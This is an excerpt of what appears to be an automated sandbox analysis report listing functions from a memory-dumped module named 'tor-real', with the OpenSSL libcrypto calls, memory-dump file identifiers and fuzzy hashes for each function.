                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: 7
                                                                            • API String ID: 2581946324-1790921346
                                                                            • Opcode ID: b3db1b7e6c9687a740582ab7180a880614ed749743542c1d14a4f8ea49f390f5
                                                                            • Instruction ID: cd4ebeb34ed517dd4db93bcf141e9c6a00b50c81aca73e3fa0aeb4de015fc5b4
                                                                            • Opcode Fuzzy Hash: b3db1b7e6c9687a740582ab7180a880614ed749743542c1d14a4f8ea49f390f5
                                                                            • Instruction Fuzzy Hash: B5F08CB29083208BDB11DF18E8C474BB7E4BF40348F114A59D8885B211D331E949CB91
                                                                            Function 6C0D0533 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C0EA0C0: SRP_Verify_B_mod_N.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D0540), ref: 6C0EA0DE
                                                                              • Part of subcall function 6C0EA0C0: SRP_Calc_u.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D0540), ref: 6C0EA108
                                                                              • Part of subcall function 6C0EA0C0: SRP_Calc_x.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D0540), ref: 6C0EA155
                                                                              • Part of subcall function 6C0EA0C0: SRP_Calc_client_key.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D0540), ref: 6C0EA199
                                                                              • Part of subcall function 6C0EA0C0: BN_num_bits.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D0540), ref: 6C0EA1AB
                                                                              • Part of subcall function 6C0EA0C0: CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0EA1D3
                                                                              • Part of subcall function 6C0EA0C0: BN_bn2bin.LIBCRYPTO-1_1 ref: 6C0EA1EB
                                                                              • Part of subcall function 6C0EA0C0: BN_clear_free.LIBCRYPTO-1_1 ref: 6C0EA215
                                                                              • Part of subcall function 6C0EA0C0: BN_clear_free.LIBCRYPTO-1_1 ref: 6C0EA221
                                                                              • Part of subcall function 6C0EA0C0: strlen.MSVCRT ref: 6C0EA229
                                                                              • Part of subcall function 6C0EA0C0: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0EA245
                                                                              • Part of subcall function 6C0EA0C0: BN_clear_free.LIBCRYPTO-1_1 ref: 6C0EA24D
                                                                            • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0D050D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: N_clear_free$O_clear_free$B_mod_Calc_client_keyCalc_uCalc_xN_bn2binN_num_bitsO_mallocVerify_strlen
                                                                            • String ID: j
                                                                            • API String ID: 127021746-2692410735
                                                                            • Opcode ID: 8ad011bd435e097fa87e9056c7b9a1e7d724d1375688dbc9baa1a87bc5f8537a
                                                                            • Instruction ID: eabe6514511442fc8f9618e55d13379dde622abb879dd41cb89d7df8ed40e9bf
                                                                            • Opcode Fuzzy Hash: 8ad011bd435e097fa87e9056c7b9a1e7d724d1375688dbc9baa1a87bc5f8537a
                                                                            • Instruction Fuzzy Hash: 07E092F11487008FD3009F69D88475EBBE0FF8931EF42856ED58C5B711D374A0088B81
                                                                            Function 6C09A5A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: !
                                                                            • API String ID: 2581946324-2657877971
                                                                            • Opcode ID: f255ff2eba909e9bf6caac7cdc4f83a27bdf70cf99c2d2918922dcc42deb81e9
                                                                            • Instruction ID: 9b884b4333bb8c2131e488ef5684547a9bce4c49eb8e61c75d04a3f2b9d2ab19
                                                                            • Opcode Fuzzy Hash: f255ff2eba909e9bf6caac7cdc4f83a27bdf70cf99c2d2918922dcc42deb81e9
                                                                            • Instruction Fuzzy Hash: C4D0C9F54047048FCB00AFA4E8C570D7BE4BF5A305F80598CE9845F356D37594988B43
                                                                            Function 6C0E26E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: u
                                                                            • API String ID: 2581946324-4067256894
                                                                            • Opcode ID: 00612eefd328989a6c9036572a168ff3b0ed55be3acae4712e7b4e46af73a5c9
                                                                            • Instruction ID: 098dc63794e16d72141c92f779a85882c435c0acaebbb21edab1551de045fe9a
                                                                            • Opcode Fuzzy Hash: 00612eefd328989a6c9036572a168ff3b0ed55be3acae4712e7b4e46af73a5c9
                                                                            • Instruction Fuzzy Hash: 4DD05E704483049BC300EF54C8C124E7BE0BF48349F80891CDCC86F311D738A0458B52
                                                                            Function 6C0A0D2B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_strdup.LIBCRYPTO-1_1 ref: 6C0A0D50
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_strdup
                                                                            • String ID: 8
                                                                            • API String ID: 1296259186-687329977
                                                                            • Opcode ID: e547303031716d10cf88b43d276a38cc6bb9763047204bf50c8b9c45dffecaf7
                                                                            • Instruction ID: 8670946d1ccac4b98bfe7e4b1012ff8b6cdb6a4d7a75faafd25212a0453dd168
                                                                            • Opcode Fuzzy Hash: e547303031716d10cf88b43d276a38cc6bb9763047204bf50c8b9c45dffecaf7
                                                                            • Instruction Fuzzy Hash: BBD0C9758087009FC700EF28C04961ABBE0BF89308FC5889CE88C57711D334A5599F53
                                                                            Function 6C0AAD47 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0AAE19
                                                                            • CRYPTO_strdup.LIBCRYPTO-1_1 ref: 6C0AAE31
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeO_strdup
                                                                            • String ID:
                                                                            • API String ID: 2148955802-0
                                                                            • Opcode ID: f9aab7eeadd0eb91c0fafb3a8a77a4ca0ab27301151977ccee81ebd3417e06a7
                                                                            • Instruction ID: c215ad71bcc6f9d5ef1d4465bc39494b2b43182d7098093de919b816236d3b4c
                                                                            • Opcode Fuzzy Hash: f9aab7eeadd0eb91c0fafb3a8a77a4ca0ab27301151977ccee81ebd3417e06a7
                                                                            • Instruction Fuzzy Hash: D6218371A053018FDB04DF69D48079BB7E1BF84318F65859CDC859B74AD735E842CB91
                                                                            Function 6C0E4AEC Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C66E8), ref: 6C0E4B16
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C66E8), ref: 6C0E4B8D
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C66E8), ref: 6C0E4C0D
                                                                            • ERR_put_error.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0E4C57
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$O_mallocR_put_error
                                                                            • String ID:
                                                                            • API String ID: 2563039504-0
                                                                            • Opcode ID: 63b6637ea6085c64c23d7409244ec8063d3ea8712ecfc4a7eb3428b7e531a665
                                                                            • Instruction ID: d58c1a06fb7e7fb3cb07112de9894673dd074586bb457c9080705d21dccbec08
                                                                            • Opcode Fuzzy Hash: 63b6637ea6085c64c23d7409244ec8063d3ea8712ecfc4a7eb3428b7e531a665
                                                                            • Instruction Fuzzy Hash: 0911D032A483108FC3109F95C44035AB7E2FFC8718F28CA2CE9985B764EB71E446CB85
                                                                            Function 6C09ACE7 Relevance: 3.0, APIs: 2, Instructions: 38COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • COMP_expand_block.LIBCRYPTO-1_1 ref: 6C09AD26
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C09AD5F
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_mallocP_expand_block
                                                                            • String ID:
                                                                            • API String ID: 3543690440-0
                                                                            • Opcode ID: c3698b3f9be96bc32cb3da96695cec9e70d2361cf3e0231553ef08c67d317b70
                                                                            • Instruction ID: dc8b88ec7a0d36c5fc66fab30003c0b7a348eca5716724438c39f699dd9b1fa9
                                                                            • Opcode Fuzzy Hash: c3698b3f9be96bc32cb3da96695cec9e70d2361cf3e0231553ef08c67d317b70
                                                                            • Instruction Fuzzy Hash: 980116B0A067018FDB44DF26D4C070BBBE0AF88705F10986DED888F355E334E9918B92
                                                                            Function 6C0C4A86 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0C4ABD
                                                                            • CRYPTO_memdup.LIBCRYPTO-1_1 ref: 6C0C4AF1
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeO_memdup
                                                                            • String ID:
                                                                            • API String ID: 3962629258-0
                                                                            • Opcode ID: dc1be9e733be83aa291f6b78b25d4821466861a649658561386e94890363eef9
                                                                            • Instruction ID: 37d50525fccf44ff257ff356dcfc550537ddd2514288ba0a764c257965a2d85f
                                                                            • Opcode Fuzzy Hash: dc1be9e733be83aa291f6b78b25d4821466861a649658561386e94890363eef9
                                                                            • Instruction Fuzzy Hash: AC01F6B1205B029FE7209F64D9843ABFBE0FF84309F11882DD9A99B601D775B449CF82
                                                                            Function 6C0BE760 Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: 5f74a654ddfbba0331a2dbb205be7804c18de49ce67784d00a53f2bb01474fe0
                                                                            • Instruction ID: 19d384b32ed53c1a6f5509ae1732ae6ddae50d0ad3c984505e59a42fd1548841
                                                                            • Opcode Fuzzy Hash: 5f74a654ddfbba0331a2dbb205be7804c18de49ce67784d00a53f2bb01474fe0
                                                                            • Instruction Fuzzy Hash: 2601F2B4604300CFE721DF64D0C9B5ABBE4AF48308F4985ECE9585F762D779E5448B82
                                                                            Function 6C0B247C Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_memdup.LIBCRYPTO-1_1 ref: 6C0B2499
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B24BD
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B2547
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeO_memdupR_put_error
                                                                            • String ID:
                                                                            • API String ID: 730276227-0
                                                                            • Opcode ID: 833d57b904d4899906ef4dbca559136edfbfeb808272e19c63c869c260398e94
                                                                            • Instruction ID: 14f6966df26b5ba1986151f2669cfdb2f2d8ba67dc40ff354c21c5dadbaff963
                                                                            • Opcode Fuzzy Hash: 833d57b904d4899906ef4dbca559136edfbfeb808272e19c63c869c260398e94
                                                                            • Instruction Fuzzy Hash: 01F085B1109B00CFD7008FA8E88135BBBE0AF88359F20886DE89C9F711D734D8808F81
                                                                            Function 6C09696C Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C096986
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C09699E
                                                                              • Part of subcall function 6C0959B0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0959CA
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: b2621adc17ae0dfa45be0d3625dfd2e7997fa9692f028348f1a5833d7ea14b6a
                                                                            • Instruction ID: 437236e313e553a2e39b6081ad0d7b348af71f09fb82e81831777bc79f0dc903
                                                                            • Opcode Fuzzy Hash: b2621adc17ae0dfa45be0d3625dfd2e7997fa9692f028348f1a5833d7ea14b6a
                                                                            • Instruction Fuzzy Hash: FBF0A5B51097008FD3009FA5E08135EBBE0EF88369F148A1DE9D89B7A0C335E4858B86
                                                                            Function 6C0AE0F2 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_THREAD_write_lock.LIBCRYPTO-1_1 ref: 6C0AE111
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0AE129
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_unlockD_write_lock
                                                                            • String ID:
                                                                            • API String ID: 1724170673-0
                                                                            • Opcode ID: e7b3899accfeffb28c8a06bf154d38761420515e3817295ba43145f8d801ee5b
                                                                            • Instruction ID: 275c56556acba02e9bc065f7c2183ea0e9d2f93b5c50e8375f4250cd241f484d
                                                                            • Opcode Fuzzy Hash: e7b3899accfeffb28c8a06bf154d38761420515e3817295ba43145f8d801ee5b
                                                                            • Instruction Fuzzy Hash: 4CE092B59447098BCB50AF68C4C4B9A77E0BF18304F4509ACED98AB705E634B9858FA1
                                                                            Function 6C0969D0 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C09A5A0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C09A5BD
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C096ADD
                                                                              • Part of subcall function 6C0959B0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0959CA
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
